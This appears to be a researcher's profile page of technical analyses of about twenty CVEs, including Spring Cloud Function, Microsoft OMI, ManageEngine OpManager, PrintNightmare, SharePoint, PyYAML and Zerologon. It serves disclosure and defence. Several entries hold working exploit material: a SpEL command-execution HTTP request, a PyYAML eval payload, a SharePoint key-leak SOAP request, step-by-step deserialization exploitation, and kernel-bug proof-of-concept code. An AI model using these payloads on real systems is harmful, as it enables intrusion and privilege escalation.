zeroSteiner (285)

Last Login: May 10, 2022
4th Place

zeroSteiner's Latest (20) Contributions

Sort by:
Filter by:
  • Attacker Value
  • Exploitability
    Very High
Technical Analysis

CVE-2022-22963 is an unauthenticated remote code execution vulnerability within Spring Cloud Function prior to 3.1.7 and 3.2.3. This vulnerability should not be confused with the reported 0-day dubbed Spring4Shell that was disclosed at around the same time.

The cause of this vulnerability is an unsafe evaluation context for the Spring Expression Language (SpEL) that can be included in the header. By crafting a POST request with the header, an attacker may execute malicious SpEL queries resulting in code execution in the context of the Spring Cloud Function application.

One early PoC demonstrated that the SpEL query could be used to execute an OS command through the Java Runtime. The following example echos to the /tmp/success file. It differs from the original by using an array of strings for the arguments passed to exec. Because the header value is an SpEL query, single quotes should be escaped by doubling them.

POST /functionRouter HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69 T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','echo "hello world" >> /tmp/msf-success'})
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

On successful exploitation, the server responds with a 500 error and a JSON response.

HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Content-Length: 153

{"timestamp":"2022-03-30T20:41:28.551+00:00","path":"/functionRouter","status":500,"error":"Internal Server Error","message":"","requestId":"8fed4100-1"}

The response from a server that was patched for the vulnerability (versions 3.1.7 and 3.2.3) is identical.

The vulnerability was patched on March, 29th, 2022 in commit bcb2a25a. The patch adds a second evaluation context and uses it when the SpEL query originates from the HTTP request header. The SimpleEvaluationContext is used when the query originates from a header.

SimpleEvaluationContext is tailored to support only a subset of the SpEL language syntax, e.g. excluding references to Java types, constructors, and bean references.

Technical Analysis

A locally exploitable vulnerability exists within Microsoft’s OMI management server in versions prior to 1.6.8-1 that can allow a local attacker to execute operating system commands as root. Exploitation consists of sending crafted binary messages to the local UNIX socket on which the service listens. Under normal circumstances, clients (typically omicli) will send an authentication frame via this interface however the authentication frame can be omitted. In this case, the default values which are initialized to 0 are used and happen to correspond to the UID and GID of the root user and group.

The service must be running in order for this vulnerability to be exploited. The socket file is located at /var/opt/omi/run/omiserver.sock and can be connected to by anyone using a socket of the AF_UNIX family.

The strace utility can be used to view the standard exchange of authentication information:

root@3ad6908bf1bc:/opt/omi/bin# strace -v -f -xx -e trace=socket,connect,write,writev,close   /opt/omi/bin/omicli iv root/scx { SCX_OperatingSystem } ExecuteShellCommand { command 'id' timeout 0 }
[pid  1271] socket(AF_UNIX, SOCK_STREAM, 0) = 6
[pid  1271] connect(6, {sa_family=AF_UNIX, sun_path="\x2f\x76\x61\x72\x2f\x6f\x70\x74\x2f\x6f\x6d\x69\x2f\x72\x75\x6e\x2f\x6f\x6d\x69\x73\x65\x72\x76\x65\x72\x2e\x73\x6f\x63\x6b"}, 110) = 0
[pid  1271] writev(6, [{iov_base="\x2f\x7e\xa8\xb1\x08\x06\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x08\xd5\x83\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"..., iov_len=48}, {iov_base="\xd8\xd5\x83\x01\x00\x00\x00\x00\xd0\xd8\x83\x01\x00\x00\x00\x00\xd0\xd4\x83\x01\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"..., iov_len=248}], 2) = 296
[pid  1271] write(5, "\x00\x00\x00\x00\x00\x00\x00\x00", 8) = 8
[pid  1271] close(7)                    = 0
[pid  1272] writev(6, [{iov_base="\x2f\x7e\xa8\xb1\x08\x06\x01\x00\x00\x00\x00\x00\x05\x00\x00\x00\x88\x33\x83\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"..., iov_len=112}, {iov_base="\x57\x99\x2b\x46\x01\x00\x00\x00\x0f\x00\x00\x00\x5f\x4f\x4d\x49\x5f\x4f\x70\x74\x69\x6f\x6e\x53\x65\x74\x00\x00\x00\x00\x00\x00"..., iov_len=188}, {iov_base="\x60\xea\x6a\xb2\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xa0\x0b\x61\x57\x46\x7f\x00\x00\xe8\x34\x83\x01\x00\x00\x00\x00"..., iov_len=80}, {iov_base="\x60\xea\x6a\xb2\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xa0\x0b\x61\x57\x46\x7f\x00\x00\xe8\x34\x83\x01\x00\x00\x00\x00"..., iov_len=1360}, {iov_base="\x57\x99\x2b\x46\x02\x00\x00\x00\x14\x00\x00\x00\x53\x43\x58\x5f\x4f\x70\x65\x72\x61\x74\x69\x6e\x67\x53\x79\x73\x74\x65\x6d\x00"..., iov_len=108}, {iov_base="\xd0\x86\x83\x01\x00\x00\x00\x00\x70\x8a\x83\x01\x00\x00\x00\x00\x80\x8a\x83\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00"..., iov_len=1008}], 6) = 2856
[pid  1272] write(1, "\x69\x6e\x73\x74\x61\x6e\x63\x65\x20\x6f\x66\x20\x45\x78\x65\x63\x75\x74\x65\x53\x68\x65\x6c\x6c\x43\x6f\x6d\x6d\x61\x6e\x64\x0a", 32instance of ExecuteShellCommand
) = 32
[pid  1272] write(1, "\x7b\x0a", 2{
)     = 2
[pid  1272] write(1, "\x20\x20\x20\x20\x52\x65\x74\x75\x72\x6e\x56\x61\x6c\x75\x65\x3d\x74\x72\x75\x65\x0a", 21    ReturnValue=true
) = 21
[pid  1272] write(1, "\x20\x20\x20\x20\x52\x65\x74\x75\x72\x6e\x43\x6f\x64\x65\x3d\x30\x0a", 17    ReturnCode=0
) = 17
[pid  1272] write(1, "\x20\x20\x20\x20\x53\x74\x64\x4f\x75\x74\x3d\x75\x69\x64\x3d\x30\x28\x72\x6f\x6f\x74\x29\x20\x67\x69\x64\x3d\x30\x28\x72\x6f\x6f"..., 50    StdOut=uid=0(root) gid=0(root) groups=0(root)
) = 50
[pid  1272] write(1, "\x0a", 1
)         = 1
[pid  1272] write(1, "\x20\x20\x20\x20\x53\x74\x64\x45\x72\x72\x3d\x0a", 12    StdErr=
) = 12
[pid  1272] write(1, "\x7d\x0a", 2}
)     = 2
[pid  1271] write(5, "\x00\x00\x00\x00\x00\x00\x00\x00", 8) = 8
[pid  1272] close(6)                    = 0
+++ exited with 0 +++

By following the writev calls, the standard exchange can be viewed. The frames starting with \x2f\x7e\xa8\xb1 are header frames. All of the data sent as part of the first request can be omitted, leaving the second which contains the command to execute within the binary structure. The results of the operating system command can be read from the socket, though they must be extracted from the binary response. The commands are executed within the context of a subshell.

This vulnerability can be exploited in the default configuration and was patched in version 1.6.8-1 which was released on September 8th 2021.

  • Attacker Value
  • Exploitability
    Very High
Technical Analysis

Apache doesn’t typically run with root privileges in most environments so the value of this vulnerability will largely be in using it to leak application-specific secrets such as signing keys, database connection strings, source code etc. Path traversal vulnerabilities are among the easiest to exploit and involve no type of corruption, making them very reliable and safe to use multiple times.

There will likely be evidence within the Apache access logs of exploitation. Filtering on the HTTP status code could also provide insight into what files the attacker was able to successfully leak.

  • Attacker Value
  • Exploitability
Technical Analysis

The is a class that was added to fix the serialization issue originally disclosed in CVE-2020-28653. It’s located in the OpManagerServerClasses.jar file. It works by overriding the resolveClass method and using a boolean state variable classResolved. When the object is initialized, the caller must call setClassName to add the names of one or more classes that are allowed to be deserialized. The classResolved state variable is initialized to false, and when a class is resolved if it’s name is in the list of allowed classes, it’s set to true and resolving carries on as usual. If no allowed classes are defined, or the class name that is being deserialized is not in the allowed list, an exception is thrown.

A flaw exists in this implementation whereby if a single ITOMObjectInputStream instance is used for multiple readObject calls, then only the first will be protected because the classResolved state variable will persist into subsequent calls. This means a vulnerable use of this class would initialize it and then use the same instance for 2 or more readObject calls. The first object must be of the expected type, but any after that can be used for malicious deserialization purposes.

Such a vulnerable invocations is present in the class’s process method. This class is located in the AdventNetSUMServer.jar file. It can be accessed by sending a serialized SUMPDU object with an OPEN_SESSION request (see SUMHttpRequestHandler.processSumPDU). This will cause SUMServerIOAndDataAnalyzer to be initialized as the socket client. Once initialized, the data field of serialized SUMPDU object will be passed to the SUMServerIOAndDataAnalyzer.process method where the vulnerable serialization operations can occur.

Technical Analysis

A deserialization vulnerability exists in the ManageEngine OpManager platform that can be leveraged by an unauthenticated attacker to execute code as the application user which is typically NT AUTHORITY\SYSTEM on Windows and root on Linux.

Exploitation can be broken down into three high level steps.

  1. Issue an HTTP request to the application’s page, to have an HTTP session cookie issued. For this purpose the login page works just fine.
  2. Issue a POST request to the /servlets/ resource with a body of \xac\xed\x00\x05\x77\x04\x00\x00\x03\xea which is 1002 serialized as a Java int. This command associates a handler to the HTTP session that is then exploited.
  3. Issue a POST request to the /servlets/ resource. The body of this request is the length in bytes of the serialized Java payload as a 32-bit unsigned, big endian value followed by the serialized Java payload.

In Ruby the POST body would be made like:

data = [ java_payload.length ].pack('N') + java_payload

Step 3 can be repeated multiple times to execute a different serialized Java payload to for example, execute multiple OS commands.

The default OpManager instance is vulnerable out of the box, there is no configuration necessary and a user never needs to have logged in. Technically, the HTTP request handler may fail in step 2 but it does so after the necessary request handler has been associated with the session, allowing exploitation to proceed regardless.

A patched version (v12.5.233 and later) will not respond with a body starting with \xac\ed\x00\x05 which can be used by an attacker to check for exploitability. The version number can also be found in the source of the login page by searching for paths beginning with /cachestart/#####/ where ##### is the 5-digit version number.

A bypass for the patch issued by ManageEngine is identified as CVE-2021-3287.

Technical Analysis

CVE-2021-34527 is related to the previous CVE-2021-1675. This fixes a vulnerability whereby an authenticated attacker can connect to the remote print service (via either MS-RPRN or MS-PAR) and add a driver using a custom DLL. Upon successful exploitation, the Print Spool service would load the attacker controlled DLL from either a remote UNC path or a local path. In both cases, the DLL is then executed with NT AUTHORITY\SYSTEM privileges.

The patch for CVE-2021-34527 is effective at preventing this attack only when Point and Print is disabled, which is the default setting. This can be configured by ensuring the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint NoWarningNoElevationOnInstall is 0. The system does not need to be rebooted to enforce the changed registry key. If that registry key is defined as 1, the vulnerability can still be exploited. With Point and Print enabled, a standard UNC path used over the MS-RPRN vector (via RpcAddPrinterDriverEx) will fail with ERROR_INVALID_PARAMETER. This can be bypassed by converting the UNC path from the standard syntax (\\\public\payload.dll) to the alternative syntax (\??\UNC\\public\payload.dll).

With the patches applied and Point and Print disabled, the affected calls to RpcAddPrinterDriverEx will return ERROR_ACCESS_DENIED.

Technical Analysis

The EditingPageParser.VerifyControlOnSafeList method fails to properly validate user-supplied data. This can be leveraged by an attacker to leak sensitive information in rendered-preview content. This can be used to leak the ViewState validation key and then use it to sign a crafted object that will trigger code execution when deserialized. In order to leverage this vulnerability, an attacker must have the SPBasePermissions.ManageLists permission on the targeted SharePoint site. By default, SharePoint users may create their own site where they will have this permission.

The single request required to trigger the vulnerability involves two components, one document escaped and embedded within a SOAP request.

Inner Document

In this document it is required that the Namespace attribute be "System.Web.UI.WebControls " with the trailing space.

<%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" %>
<WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="Documents" WebId="WEB ID">
    <att:xmldatasource runat="server" id="XDS1"
      datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/80/web.config" />
      <xsl:stylesheet version="2.0" xmlns:xsl="">
          <xsl:output method="xml" indent="yes" />
          <xsl:template match="/">
              <xsl:copy-of select="." />

The WEB ID needs to be updated to the UUID of the targeted site which is easily obtainable via a GET request to _api/web/id.

Outer Document

The inner document is embedded within the webPartXml node and the entire body is sent as a SOAP request to the _vti_bin/WebPartPages.asmx endpoint as a POST request.

<soap12:Envelope xmlns:xsi="" xmlns:xsd="" xmlns:soap12="">
    <RenderWebPartForEdit xmlns="">
      <webPartXml>INNER DOCUMENT</webPartXml>

The response from this request will contain quite a few things, but embedded a couple of documents deep will ultimately be the validation key used for the server’s ViewState.

.NET Serialization Gadget Chain

With the validation key, an attacker can use the ysoserial.NET project to create a payload using the TypeConfuseDelegate gadget chain and the LosFormatter. Code execution will be obtained within the context of the SharePoint application with the services of the SharePoint service.

For more information, see the original ZDI on which this analysis is based.

Technical Analysis

This vulnerability is a deserialization flaw in Exchange’s MeetingPollProposeOptionsPayload.GetRequests() method. This method can be triggered with an HTTP request and when issued a specially crafted XML payload, can lead to OS command execution within the context of the w3wp.exe process which has SYSTEM level privileges.

The XML payload is a .NET serialized object which contains the ObjectDataProvider chain from YSoSerial.NET and the DataContractSerializer formatter. The payload needs to be crafted to be compatible with the way in which Exchange deserializes it.

Since many users have sufficient access to authenticate to Exchange, this could easily be used in conjunction with a phishing or password guessing attack and lead to an initial breach.

There was a blog detailing this vulnerability and a PoC written by the same author. The PoC is non-functional without being edited.

  • Attacker Value
  • Exploitability
    Very High
Technical Analysis

This vulnerability is pretty straightforward to exploit. It is due to an unauthenticated SOAP interface in the Apache OFBiz application that accepts and deserializes an arbitrary Java object. This can be leveraged by an attacker to submit a payload to the server that after being deserialized will result in a command being executed. The YSoSerial ROME gadget chain can be used for this purpose.

The serialized object is encoded in hex and placed within the cus-obj XML node of the SOAP request:

<soapenv:Envelope xmlns:soapenv="">
            <std-String value=""/>

This was taken from a PoC which was credited in the Metasploit exploit module.

Technical Analysis

The exploitation of this vulnerability would be most easily accomplished using a patched version of OpenSSL to modify the extensions sent within the ClientHello of the renegotiation. Successful exploitation of this vulnerability is likely limited to a Denial of Service condition. Allocating and setting the contents of the NULL page is extremely unlikely from the vantage point of a remote attacker.

The following patch can be applied to OpenSSL 1.1.1k (commit fd78df59) to generate a build capable of reproducing the vulnerability.

index ce8a75794c..3e3f774dab 100644
--- a/ssl/statem/extensions_clnt.c
+++ b/ssl/statem/extensions_clnt.c
@@ -272,7 +272,7 @@ EXT_RETURN tls_construct_ctos_sig_algs(SSL *s, WPACKET *pkt,
         return EXT_RETURN_NOT_SENT;
     salglen = tls12_get_psigalgs(s, 1, &salg);
-    if (!WPACKET_put_bytes_u16(pkt, TLSEXT_TYPE_signature_algorithms)
+    if (!WPACKET_put_bytes_u16(pkt, (s->renegotiate ? TLSEXT_TYPE_signature_algorithms_cert : TLSEXT_TYPE_signature_algorithms))
                /* Sub-packet for sig-algs extension */
             || !WPACKET_start_sub_packet_u16(pkt)
                /* Sub-packet for the actual list */

What this change is doing is swapping the signature_algorithms extension for signature_algorithms_cert when the SSL context is renegotiating.

With a patched version of OpenSSL built, run the openssl client, specifying TLS version 1.2 and renegotiate.

echo R | apps/openssl s_client -connect target:443 -msg -tls1_2
Technical Analysis

This is vulnerability is a bypass for the patch issued for CVE-2020-16875. The vulnerability was also identified and analyzed by Steven Seeley. The patch can be bypassed using call operators as described in Seeley’s blog Making Clouds Rain RCE in Office 365.

The original vulnerability is a command injection vulnerability that results in OS commands being executed with SYSTEM level privileges on the Exchange server due to insufficient sanitization on a cmdlet invocation.

  • Attacker Value
  • Exploitability
Technical Analysis

From NVD:

A memory corruption issue was found in Artifex Ghostscript 9.50 and 9.52. Use of a non-standard PostScript operator can allow overriding of file access controls. The ‘rsearch’ calculation for the ‘post’ size resulted in a size that was too large, and could underflow to max uint32_t.

GhostScript is a pretty popular engine for Postscript and PDF documents. A critical feature of this is the sandbox which makes it safe to view documents received from untrusted sources. Escaping from the sandbox would all a malicious user to leverage dangerous functions that are builtin that can allow arbitrary file reading and writing along with OS command execution in certain environments.

The sandbox escape can be performed by leveraging the underflow to access memory outside the permissible boundary. By reading key locations, a specially crafted malicious document could corrupt the flag that controls the sandbox.

A weaponized version of this exploit would likely need to tell if it’s on Windows or LInux, which may be able to be determined at runtime by performing a file read and handling failures using well known file paths as the target.


Technical Analysis

A vulnerability exists within Plex that allows an authenticated attacker to submit data that is deserialized through Python in an unsafe manner. This leads to code execution within the context of the Plex server. Given the nature of Python serialization vulnerabilities, exploitation of this is relatively easy and reliable. Exploitation attempts involve creating a new photo library and setting the LocalAppDataPath which will trigger the deserialization process.

Technical Analysis

An error exists within cng!CfgAdtpFormatPropertyBlock where buffer is allocated from a value that is truncated to be 16-bits. The function then goes on and performs a binary to ASCII hex conversion, writing the ASCII hex characters to this buffer. While performing the conversion, the original buffer’s correct length is used causing the write to continue out of bounds.

The vector for this vulnerability is local. A malicious attacker would first have to have code execution on the target system from any context including that of a sandboxed application. From there they would open a handle to \\.\GLOBALROOT\Device\Cng before issuing the 0x390400 IOCTL with a crafted input buffer. The crafted input buffer contains a size parameter as one of the fields that when set to 0x2aab or greater will trigger the overflow.

Exploitation of this bug won’t be easy due to it being a heap based memory corruption within the kernel’s NonPagedPool. The attacker has partial control over the size of the allocation as constrained by ((size * 6) & 0xffff).

This vulnerability was originally reported by Google’s Project Zero who also reported that it is being actively exploited in the wild. The original report is on their tracker. The live in the wild exploitation is reportedly targeted and not related to the US elections. A patch is expected to be release on November 10th, 2020.

While the vulnerable code appears to be present within Windows 7 SP1 x64 as verified through static analysis. The original PoC provided by Google’s Project Zero team, does not trigger the bug on this platform. Within the callstack the chain is accessible, however a difference within the implementations is causing cng!BCryptSetContextFunctionProperty to branch leading to the path to cng!CfgAdtReportFunctionPropertyModification being missed.


Attempted exploitation of this vulnerability can be detected through auditing event ID 5069. This must be configured in order to detect exploitation attempts. To enable it, start secpol.msc, then navigate to Security Settings > Advanced Audit Policy Configuration > System Audit Policies > Policy Change. Set Audit Other Policy Change Events to enable both “Success” and “Failure”. With this change in place, event ID 5069 will be loaded to the standard Windows Security Log that is accessible through the event viewer.

Exploitation attempts can then be identified through the length of the reported “value” field.

Proof of Concept

The following is a port of the original Proof of Concept released by Google Project Zero into Python and updated to demonstrate the vulnerability on both Windows 7 SP1 and Windows 10.

import ctypes
import random

from mayhem.windll import *

value = (ctypes.c_ubyte * 0x2aab)()
    "XXX_{:08x}".format(random.randint(0, 0xffffffff)),

Instead of directly issuing the IOCTL, this variant uses the bcrypt!BCryptSetContextFunctionProperty function with the appropriate arguments. Randomizing the pszProperty argument helps to ensure that the vulnerability is triggered exactly once each time the code is run.

Technical Analysis


The PyYAML library contains a vulnerability where an attacker with control over data which is loaded using the load function can trigger arbitrary Python code execution. The latest version as of this writing (5.3.1) is affected. PyYAML version 4.1 changed the default load to use safe_load by default, however this was reverted in the 4.2 release. Later, in version 5.1 the PyYAML project implemented a new default FullLoader class which prevented function calls but is in sufficient to prevent code execution.


The latest versions of PyYAML (5.1+) use a default loader implementation that allow deserialization of objects and references but not functions. The builtin map is a class in Python3 and can be used to apply the builtin eval function to indirectly trigger a function call.

- !!python/object/new:map 
  - !!python/name:eval
  - [ "RCE_HERE" ]

An attacker looking to leverage this vulnerability would need to identify that YAML is loaded by the application and then submit their crafted data to be loaded.


The PyYAML library contains a two primary alternatives to load data safely. The first is to use the load_safe alternative, the second is to specify the SafeLoader class as the Loader keyword argument to the standard load function. This is detailed in the PyYAML-Deprecation) Wiki page. Developers using PyYAML should use one of these safe methods and ensure that they are not loading data from untrusted sources.

See: for more information.

Technical Analysis

Analysis performed using tcpip.sys from Windows 10 v1909 x64 (sha256: f2a0cb717ccbe7e7ff93ccadaeb23df4a8a76b386b6623fee1b5a975c3f16bfa)


A crafted IPv6 Router Advertisement frame can a stack based buffer overflow due to an improper calculation of the RDNSS
(type 25) option. When an RDNSS option uses a crafted length with an even value the parser will interpret the last 8
bytes of it as the start of the next option. When combined with fragmentation, this can cause a overflow due to the size
of the mis-interpreted header not being validated.

Exploitability Analysis

The public PoCs reliably reproduce this vulnerability to trigger a bug check condition. The relevant function is
tcpip!Ipv6pHandleRouterAdvertisement which handles the parsing logic and is the function whose local variable is
overflown. The public PoCs use a Route Information (type 24) option to actually perform the overflow. In this case the
actual overflow is performed by a call to NdisGetDataBuffer at Ipv6pHandleRouterAdvertisement+0xb8a01.

In this call, the third parameter Storage is a pointer to the stack at location rbp+0xb8. From the documentation:

(Storage is) a pointer to a buffer, or NULL if no buffer is provided by the caller. The buffer must be greater than or
equal in size to the number of bytes specified in BytesNeeded . If this value is non-NULL, and the data requested is
not contiguous, NDIS copies the requested data to the area indicated by Storage.

Since Storage is non-NULL, non-contiguous (due to the packet fragmentation), it is used as a destination buffer and
wOptLength bytes are copied to it. In this context, wOptLength is the length of the option in the original data
times 8. With a length of 176 (field value 0x16), the stack cookie at offset rbp+0x260 will be overwritten. As the
function returns, this leads to a Bug Check when the stack cookie is checked at
tcpip!Ipv6pHandleRouterAdvertisement+0x10e0. The value of the stack cookie is also XORed with the value of the stack
pointer (rsp) so knowing the value would not be sufficient to replace it in the overwrite.

After the overflow operation has taken place, the loop continues to process the following options:

  • Type 3 (Prefix Information)
  • Type 24 (Route Information)
  • Type 25 (RDNSS)
  • Type 31 (DNS Search List Option)


From the /GS (Buffer Security Check) documentation:

A vulnerable parameter is allocated before the cookie and local variables. A buffer overrun can overwrite these
parameters. And code in the function that uses these parameters could cause an attack before the function returns and
the security check is performed.

After inspecting the logic for each of the four types that will be processed, there were no identified references to
values which could be controlled by an attacker using the overflow. While the handler for the Prefix Information (type
3) option uses a 32 byte buffer which could be controlled by the attacker starting at rbp+0x200, it is memset to
zero at Ipv6pHandleRouterAdvertisement+0xa19.

There are no other references to the space between rbp+0x1b8 (&Storage) and rbp+0x260 (the stack cookie) that are
accessible from this late in the Ipv6pHandleRouterAdvertisement function.

An alternative vector could potentially utilize a Search List (type 31) option to trigger the overflow. This function
makes a similar call to NdisGetDataBuffer with a location on the stack. In this case the attacker can overflow the
buffer starting at rbp+0x90 and overwrite the stack cookie at rbp+0x190. This function is less interesting as there
appear to be no usable references before the return and there is no looping logic due to the handler and overflow being
a subroutine of Ipv6pHandleRouterAdvertisement.

  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

Over the past couple of years (2018-2020) attacks against RDP have become more and more common. Recent improvements in attacker-related tooling can be contributed to generally available and mature projects targeting RDP and a number of remotely exploitable vulnerabilities being disclosed.

Memory Corruption Flaws

One of the best examples of this is CVE-2019-0708 (AKA BlueKeep) which was an unauthenticated, remotely exploitable use-after-free in RDP. This particular vulnerability was able to be developed to yield semi-reliable code execution and is widely utilized by attackers. Following this, CVE-2019-1182 (AKA DejaBlue) was discovered as well. This particular bug was a heap corruption within the server’s dynamic channel handling. While this vulnerability has not to this date had exploitat code released, it also contributed to the popularity of RDP vulnerability research in 2019.

Why RDP As An Attack Surface?

Regardless of code execution-type vulnerabilities, RDP is an attractive attack surface for the following reasons:

  • It’s commonly accessible internally and relatively accessible externally
  • It’s common that non-administrative users can authenticate to it, offering an initial foothold to attackers
  • The service can yield version information about the host operating system
  • Established sessions can be hijacked using publicly documented tools techniques and procedure (TTPs)
  • In addition to offering a graphical interface to the desktop session, it can also be used to mount drives and transfer files

When compared to an interface such as SMB for the purpose of lateral movement, RDP offers a much larger degree of freedom for the attacker. Using SMB, attackers are able to use a small number of techniques to achieve code execution such as PSexec. Alternatively, RDP through it’s graphical interface and file transfer capabilities offers attackers near limitless possibilities. This number of possibilities directly improves the attackers evasion capabilities as they can easily adapt and shift techniques that are blocked through whatever sort of endpoint protection maybe present. Furthermore, SMB as an attack surface is very well know and widely documented. For those reasons, and the fact that there are choke points from an attacker workflow perspective, there are mature defenses and controls in place (such as event monitoring) that are either not applicable to or are less effective when compared to RDP.

Technical Analysis

The Zerologon vulnerability is related to the misuse of the AES-CFB8 cipher within the MS-NRPC (Netlogon) service. The result is that 1 in 256 authentication attempts using an all-zero plaintext value will result in an all-zero ciphertext. This means that a user can authenticate as a target system without knowledge of the shared secret which is the hash of the client’s computer account password.

The affected service by default uses a very high (around 40,000-50,000) TCP port. This port is dynamic since it is a DCERPC service. An attacker must know this value in order to connect to and communicate with the Netlogon service. To find it, an attacker can use the mapping service on tcp/135 to query the services by GUID (12345678-1234-abcd-ef00-01234567cffb). While it is possible to leverage the vulnerability using a named pipe interface over SMB (tcp/445), it requires authentication which sort of defeats the purpose of the vulnerability.

Most public PoCs (including the Metasploit Framework module) leverage the vulnerability to authenticate to the Netlogon service and then changes the machine account password to an empty / blank value. This value has the LM/NTLM hash value of aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0. This technique relies on using the NetrServerPasswordSet2 function which encrypts the new computer account password with the session key that also misuses the AES-CFB8 cipher. After exploitation the attacker can use this hash value to authenticate to the target Domain Controller using the machine account (the NetBIOS name with a $ suffix, e.g. WIN2019$). After leveraging this vulnerability to reset the machine account password, it’s important that the attacker restore the original value to prevent authentication failures to the target Domain Controller.

This vulnerability does not appear to affect Windows Server 2008 which was not patched by Microsoft.

Technical Analysis

A vulnerability exists within the NtGditretchBlt system call that can be leveraged to trigger an out of bounds read access within win32kfull!vStrWrite04. The bug manifests itself when the Special Pool setting is enabled through the driver verifier utility.

An attacker would use this flaw to escalate their privileges to that of the local system through this kernel mode exploit.

Exploitation would be very difficult, a successful attack would need an information leak as well as reliable control over the win32k heap which is more difficult on Windows 10 than previous versions of Windows due to type isolation (added in RS3) and the KASLR improvements (added in the Anniversary Update). The win32k subsystem is however available as an attack surface on all versions of Windows making it a very high-value target.

#include <Windows.h>

int main()
    BITMAPINFO bi = {{0x28, 0x2, 0xfffffffffffffffb, 0x2, 0x4, 0x0, 0x0, 0x0, 0x0, 0x0, 0x2}};
    char out[0x1000] = {0};
    HDC r0 = CreateCompatibleDC(0x0);
    HBITMAP r1 = CreateDIBitmap(r0, 0x0, 0x6, &out, &bi, 0x0);
    SelectObject(r0, r1);
    StretchBlt(r0, 0x0, 0x0, 0x8, 0x8, r0, 0x0, 0x0, 0xffffffffffffffeb, 0x4, 0xee00e6);

    return 0;

Original PoC provided by Check Point Research, see:

  • Attacker Value
  • Exploitability
    Very High
Technical Analysis

A vulnerability exists in vBulletin that can allow the protections originally put in place to address CVE-2019-16759 to be bypassed. The vulnerability exists in how the patch handles child templates that are rendered by the widget_php template. A detailed write up which analyzes the patch and describes the issue regarding the child templates was posted to by the original author who discovered the vulnerability.

Successful exploitation involves an HTTP POST request and yields code execution in the context of the web application user. Due to the nature of templates, the result of the evaluation is included in the rendered output, allowing attackers to retrieve the output of their commands which makes the vulnerability more useful.

POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 168


This vulnerability was fixed in vBulletin version 5.6.3, with patches released for versions 5.6.0, 5.6.1 and 5.6.2.

To temporarily remediate the vulnerability, delete the “widget_php” module by following these steps:

  1. Put the site into debug mode.
  2. Log into the AdminCP.
  3. Go to Styles > Style Manager.
  4. Open the template list for the MASTER style.
  5. Scroll to the bottom where it says Module Templates.
  6. Highlight the widget_php module.
  7. Click the Revert Button.